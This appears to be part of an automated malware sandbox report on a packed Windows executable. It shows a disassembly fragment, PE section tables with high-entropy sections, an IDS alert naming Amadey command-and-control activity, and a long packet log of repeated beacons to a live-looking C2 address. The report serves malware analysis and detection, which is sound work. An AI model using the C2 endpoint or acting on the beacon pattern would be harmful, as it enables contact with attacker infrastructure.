                                cmovle ebx, dword ptr [eax+eax]
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                jmp 00007F6F311CE805h
                                add byte ptr [ebx], cl
                                or al, byte ptr [eax]
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax+37h], ah
                                adc cl, byte ptr [edi]
                                aam 8Fh
                                mov word ptr [ebx], seg?
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                or ecx, dword ptr [edx]
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                push es
                                add byte ptr [eax], 00000000h
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                adc byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                or ecx, dword ptr [edx]
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x6a057 | 0x6b | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x69000 | 0x448 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x4a0080 | 0x10 | ihqucnpr
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x4a0030 | 0x18 | ihqucnpr
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(unnamed) | 0x1000 | 0x68000 | 0x2de00 | 6f731acc3610ed0db6df8ef7b17cfb50 | False | 0.9982703933923706 | data | 7.984163240337756 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x69000 | 0x448 | 0x600 | 23f61aeefa7c3d30c07a21aa8f45e969 | False | 0.3053385416666667 | data | 5.28505835027857 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x6a000 | 0x1000 | 0x200 | cc76e3822efdc911f469a3e3cc9ce9fe | False | 0.1484375 | data | 1.0428145631430756 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(unnamed) | 0x6b000 | 0x2a0000 | 0x200 | 6608e2e68038d83a8db58f0c9758e596 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
ihqucnpr | 0x30b000 | 0x196000 | 0x195200 | f287e3c41561b135b96718afbd4ebb0a | False | 0.9945654794045048 | data | 7.953078647253167 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
loaatlni | 0x4a1000 | 0x1000 | 0x400 | 1a7dbe96e28d0a0da6e519a2d6655338 | False | 0.853515625 | data | 6.4667655699525275 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x4a2000 | 0x3000 | 0x2200 | 576ba84a2deef18d66e973601d6ad347 | False | 0.064453125 | DOS executable (COM) | 0.754750260100703 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0x69070 | 0x256 | ASCII text, with CRLF line terminators | | | 0.5100334448160535
RT_MANIFEST | 0x692c8 | 0x17d | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.5931758530183727
DLL | Import
kernel32.dll | lstrcpy
Language of compilation system | Country where language is spoken
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-20T13:08:05.776431+0100 | 2856147 | ETPRO MALWARE Amadey CnC Activity M3 | 1 | 192.168.2.4 | 49783 | 185.215.113.43 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 20, 2024 13:08:05.073600054 CET | 49783 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:05.079705954 CET | 80 | 49783 | 185.215.113.43 | 192.168.2.4
Nov 20, 2024 13:08:05.080454111 CET | 49783 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:05.080642939 CET | 49783 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:05.085536957 CET | 80 | 49783 | 185.215.113.43 | 192.168.2.4
Nov 20, 2024 13:08:05.775851011 CET | 80 | 49783 | 185.215.113.43 | 192.168.2.4
Nov 20, 2024 13:08:05.776431084 CET | 49783 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:07.281462908 CET | 49783 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:07.281791925 CET | 49799 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:07.286792994 CET | 80 | 49799 | 185.215.113.43 | 192.168.2.4
Nov 20, 2024 13:08:07.286951065 CET | 49799 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:07.287128925 CET | 49799 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:07.287406921 CET | 80 | 49783 | 185.215.113.43 | 192.168.2.4
Nov 20, 2024 13:08:07.287599087 CET | 49783 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:07.291980982 CET | 80 | 49799 | 185.215.113.43 | 192.168.2.4
Nov 20, 2024 13:08:07.990255117 CET | 80 | 49799 | 185.215.113.43 | 192.168.2.4
Nov 20, 2024 13:08:07.990391016 CET | 49799 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:09.609586000 CET | 49799 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:09.610027075 CET | 49815 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:09.615278006 CET | 80 | 49799 | 185.215.113.43 | 192.168.2.4
Nov 20, 2024 13:08:09.615346909 CET | 49799 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:09.615659952 CET | 80 | 49815 | 185.215.113.43 | 192.168.2.4
Nov 20, 2024 13:08:09.615837097 CET | 49815 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:09.616029978 CET | 49815 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:09.622359991 CET | 80 | 49815 | 185.215.113.43 | 192.168.2.4
Nov 20, 2024 13:08:10.320969105 CET | 80 | 49815 | 185.215.113.43 | 192.168.2.4
Nov 20, 2024 13:08:10.321037054 CET | 49815 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:11.828632116 CET | 49815 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:11.829150915 CET | 49831 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:11.834173918 CET | 80 | 49815 | 185.215.113.43 | 192.168.2.4
Nov 20, 2024 13:08:11.834238052 CET | 49815 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:11.834681034 CET | 80 | 49831 | 185.215.113.43 | 192.168.2.4
Nov 20, 2024 13:08:11.834734917 CET | 49831 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:11.836378098 CET | 49831 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:11.841492891 CET | 80 | 49831 | 185.215.113.43 | 192.168.2.4
Nov 20, 2024 13:08:12.550599098 CET | 80 | 49831 | 185.215.113.43 | 192.168.2.4
Nov 20, 2024 13:08:12.550669909 CET | 49831 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:14.249011993 CET | 49831 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:14.249408960 CET | 49846 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:14.254254103 CET | 80 | 49846 | 185.215.113.43 | 192.168.2.4
Nov 20, 2024 13:08:14.254368067 CET | 49846 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:14.255903006 CET | 80 | 49831 | 185.215.113.43 | 192.168.2.4
Nov 20, 2024 13:08:14.255980968 CET | 49831 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:14.256150961 CET | 49846 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:14.260956049 CET | 80 | 49846 | 185.215.113.43 | 192.168.2.4
Nov 20, 2024 13:08:14.983750105 CET | 80 | 49846 | 185.215.113.43 | 192.168.2.4
Nov 20, 2024 13:08:14.983891010 CET | 49846 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:16.500797987 CET | 49846 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:16.501173019 CET | 49861 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:16.506067038 CET | 80 | 49846 | 185.215.113.43 | 192.168.2.4
Nov 20, 2024 13:08:16.506113052 CET | 80 | 49861 | 185.215.113.43 | 192.168.2.4
Nov 20, 2024 13:08:16.506139994 CET | 49846 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:16.506215096 CET | 49861 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:16.506350040 CET | 49861 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:16.514049053 CET | 80 | 49861 | 185.215.113.43 | 192.168.2.4
Nov 20, 2024 13:08:17.254261971 CET | 80 | 49861 | 185.215.113.43 | 192.168.2.4
Nov 20, 2024 13:08:17.254343033 CET | 49861 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:18.878000975 CET | 49861 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:18.878349066 CET | 49878 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:18.883272886 CET | 80 | 49861 | 185.215.113.43 | 192.168.2.4
Nov 20, 2024 13:08:18.883291960 CET | 80 | 49878 | 185.215.113.43 | 192.168.2.4
Nov 20, 2024 13:08:18.883346081 CET | 49861 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:18.883418083 CET | 49878 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:18.883585930 CET | 49878 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:18.891308069 CET | 80 | 49878 | 185.215.113.43 | 192.168.2.4
Nov 20, 2024 13:08:19.612067938 CET | 80 | 49878 | 185.215.113.43 | 192.168.2.4
Nov 20, 2024 13:08:19.612145901 CET | 49878 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:21.125370979 CET | 49878 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:21.125684977 CET | 49890 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:21.134519100 CET | 80 | 49878 | 185.215.113.43 | 192.168.2.4
Nov 20, 2024 13:08:21.134601116 CET | 49878 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:21.134641886 CET | 80 | 49890 | 185.215.113.43 | 192.168.2.4
Nov 20, 2024 13:08:21.134723902 CET | 49890 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:21.134896994 CET | 49890 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:21.141022921 CET | 80 | 49890 | 185.215.113.43 | 192.168.2.4
Nov 20, 2024 13:08:21.831510067 CET | 80 | 49890 | 185.215.113.43 | 192.168.2.4
Nov 20, 2024 13:08:21.832514048 CET | 49890 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:23.453704119 CET | 49890 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:23.454123020 CET | 49906 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:23.458996058 CET | 80 | 49906 | 185.215.113.43 | 192.168.2.4
Nov 20, 2024 13:08:23.459085941 CET | 49906 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:23.459103107 CET | 80 | 49890 | 185.215.113.43 | 192.168.2.4
Nov 20, 2024 13:08:23.459161997 CET | 49890 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:23.459295988 CET | 49906 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:23.464267015 CET | 80 | 49906 | 185.215.113.43 | 192.168.2.4
Nov 20, 2024 13:08:24.188796997 CET | 80 | 49906 | 185.215.113.43 | 192.168.2.4
Nov 20, 2024 13:08:24.191427946 CET | 49906 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:25.703450918 CET | 49906 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:25.703774929 CET | 49919 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:25.708717108 CET | 80 | 49906 | 185.215.113.43 | 192.168.2.4
Nov 20, 2024 13:08:25.708749056 CET | 80 | 49919 | 185.215.113.43 | 192.168.2.4
Nov 20, 2024 13:08:25.708847046 CET | 49919 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:25.708864927 CET | 49906 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:25.709034920 CET | 49919 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:25.713867903 CET | 80 | 49919 | 185.215.113.43 | 192.168.2.4
Nov 20, 2024 13:08:26.411521912 CET | 80 | 49919 | 185.215.113.43 | 192.168.2.4
Nov 20, 2024 13:08:26.411668062 CET | 49919 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:28.031769991 CET | 49919 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:28.035203934 CET | 49934 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:28.039208889 CET | 80 | 49919 | 185.215.113.43 | 192.168.2.4
Nov 20, 2024 13:08:28.039292097 CET | 49919 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:28.042216063 CET | 80 | 49934 | 185.215.113.43 | 192.168.2.4
Nov 20, 2024 13:08:28.042848110 CET | 49934 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:28.044898033 CET | 49934 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:28.051732063 CET | 80 | 49934 | 185.215.113.43 | 192.168.2.4
Nov 20, 2024 13:08:28.748363972 CET | 80 | 49934 | 185.215.113.43 | 192.168.2.4
Nov 20, 2024 13:08:28.748491049 CET | 49934 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:30.250471115 CET | 49934 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:30.250804901 CET | 49950 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:30.256474972 CET | 80 | 49950 | 185.215.113.43 | 192.168.2.4
Nov 20, 2024 13:08:30.256586075 CET | 49950 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:30.256681919 CET | 49950 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:30.260802031 CET | 80 | 49934 | 185.215.113.43 | 192.168.2.4
Nov 20, 2024 13:08:30.260895014 CET | 49934 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:30.261956930 CET | 80 | 49950 | 185.215.113.43 | 192.168.2.4
Nov 20, 2024 13:08:30.964792967 CET | 80 | 49950 | 185.215.113.43 | 192.168.2.4
Nov 20, 2024 13:08:30.964850903 CET | 49950 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:32.596374989 CET | 49950 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:32.596750021 CET | 49966 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:32.601943016 CET | 80 | 49950 | 185.215.113.43 | 192.168.2.4
Nov 20, 2024 13:08:32.602032900 CET | 49950 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:32.602771044 CET | 80 | 49966 | 185.215.113.43 | 192.168.2.4
Nov 20, 2024 13:08:32.602864027 CET | 49966 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:32.602988958 CET | 49966 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:32.608056068 CET | 80 | 49966 | 185.215.113.43 | 192.168.2.4
Nov 20, 2024 13:08:33.301089048 CET | 80 | 49966 | 185.215.113.43 | 192.168.2.4
Nov 20, 2024 13:08:33.301167011 CET | 49966 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:34.813610077 CET | 49966 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:34.813971043 CET | 49982 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:34.819003105 CET | 80 | 49966 | 185.215.113.43 | 192.168.2.4
Nov 20, 2024 13:08:34.819133997 CET | 49966 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:34.819717884 CET | 80 | 49982 | 185.215.113.43 | 192.168.2.4
Nov 20, 2024 13:08:34.819803953 CET | 49982 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:34.819969893 CET | 49982 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:34.825270891 CET | 80 | 49982 | 185.215.113.43 | 192.168.2.4
Nov 20, 2024 13:08:35.548026085 CET | 80 | 49982 | 185.215.113.43 | 192.168.2.4
Nov 20, 2024 13:08:35.548151016 CET | 49982 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:37.235249043 CET | 49982 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:37.235645056 CET | 49998 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:37.242577076 CET | 80 | 49998 | 185.215.113.43 | 192.168.2.4
Nov 20, 2024 13:08:37.242783070 CET | 80 | 49982 | 185.215.113.43 | 192.168.2.4
Nov 20, 2024 13:08:37.242887974 CET | 49982 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:37.242902040 CET | 49998 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:37.243161917 CET | 49998 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:37.250129938 CET | 80 | 49998 | 185.215.113.43 | 192.168.2.4
Nov 20, 2024 13:08:37.965090036 CET | 80 | 49998 | 185.215.113.43 | 192.168.2.4
Nov 20, 2024 13:08:37.965148926 CET | 49998 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:39.469067097 CET | 49998 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:39.469412088 CET | 50012 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:39.474186897 CET | 80 | 49998 | 185.215.113.43 | 192.168.2.4
Nov 20, 2024 13:08:39.474252939 CET | 49998 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:39.474271059 CET | 80 | 50012 | 185.215.113.43 | 192.168.2.4
Nov 20, 2024 13:08:39.474343061 CET | 50012 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:39.474896908 CET | 50012 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:39.479736090 CET | 80 | 50012 | 185.215.113.43 | 192.168.2.4
Nov 20, 2024 13:08:40.175301075 CET | 80 | 50012 | 185.215.113.43 | 192.168.2.4
Nov 20, 2024 13:08:40.176635981 CET | 50012 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:41.806221008 CET | 50012 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:41.806720972 CET | 50018 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:41.815289021 CET | 80 | 50012 | 185.215.113.43 | 192.168.2.4
Nov 20, 2024 13:08:41.815340042 CET | 80 | 50018 | 185.215.113.43 | 192.168.2.4
Nov 20, 2024 13:08:41.815356016 CET | 50012 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:41.815413952 CET | 50018 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:41.816001892 CET | 50018 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:41.821283102 CET | 80 | 50018 | 185.215.113.43 | 192.168.2.4
Nov 20, 2024 13:08:42.518135071 CET | 80 | 50018 | 185.215.113.43 | 192.168.2.4
Nov 20, 2024 13:08:42.518268108 CET | 50018 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:44.034210920 CET | 50018 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:44.034575939 CET | 50019 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:44.042052031 CET | 80 | 50018 | 185.215.113.43 | 192.168.2.4
Nov 20, 2024 13:08:44.042109013 CET | 80 | 50019 | 185.215.113.43 | 192.168.2.4
Nov 20, 2024 13:08:44.042200089 CET | 50018 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:44.042234898 CET | 50019 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:44.042555094 CET | 50019 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:44.048803091 CET | 80 | 50019 | 185.215.113.43 | 192.168.2.4
Nov 20, 2024 13:08:44.736030102 CET | 80 | 50019 | 185.215.113.43 | 192.168.2.4
Nov 20, 2024 13:08:44.736094952 CET | 50019 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:46.359802008 CET | 50019 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:46.360202074 CET | 50020 | 80 | 192.168.2.4 | 185.215.113.43
Nov 20, 2024 13:08:46.369043112 CET | 80 | 50019 | 185.215.113.43 | 192.168.2.4
                                Nov 20, 2024 13:08:46.369067907 CET8050020185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:46.369214058 CET5001980192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:46.369256973 CET5002080192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:46.369529009 CET5002080192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:46.377686024 CET8050020185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:47.083113909 CET8050020185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:47.083214045 CET5002080192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:48.656779051 CET5002080192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:48.657136917 CET5002180192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:48.664155006 CET8050020185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:48.664200068 CET8050021185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:48.664283037 CET5002080192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:48.664313078 CET5002180192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:48.664452076 CET5002180192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:48.671365976 CET8050021185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:49.359998941 CET8050021185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:49.360074997 CET5002180192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:50.985124111 CET5002180192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:50.985460997 CET5002280192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:50.990704060 CET8050022185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:50.990869999 CET8050021185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:50.990900993 CET5002280192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:50.990928888 CET5002180192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:50.991095066 CET5002280192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:50.995919943 CET8050022185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:51.709582090 CET8050022185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:51.709758997 CET5002280192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:53.221337080 CET5002280192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:53.221770048 CET5002380192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:53.227196932 CET8050023185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:53.227299929 CET5002380192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:53.227421045 CET5002380192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:53.227448940 CET8050022185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:53.227509022 CET5002280192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:53.232739925 CET8050023185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:53.936414003 CET8050023185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:53.936579943 CET5002380192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:55.562894106 CET5002380192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:55.563221931 CET5002480192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:55.568361044 CET8050023185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:55.568464994 CET5002380192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:55.570133924 CET8050024185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:55.570257902 CET5002480192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:55.570486069 CET5002480192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:55.575948954 CET8050024185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:56.270329952 CET8050024185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:56.270407915 CET5002480192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:57.782058954 CET5002480192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:57.782285929 CET5002580192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:57.790601969 CET8050025185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:57.791098118 CET8050024185.215.113.43192.168.2.4
                                Nov 20, 2024 13:08:57.791198969 CET5002480192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:57.791209936 CET5002580192.168.2.4185.215.113.43
                                Nov 20, 2024 13:08:57.791459084 CET5002580192.168.2.4185.215.113.43
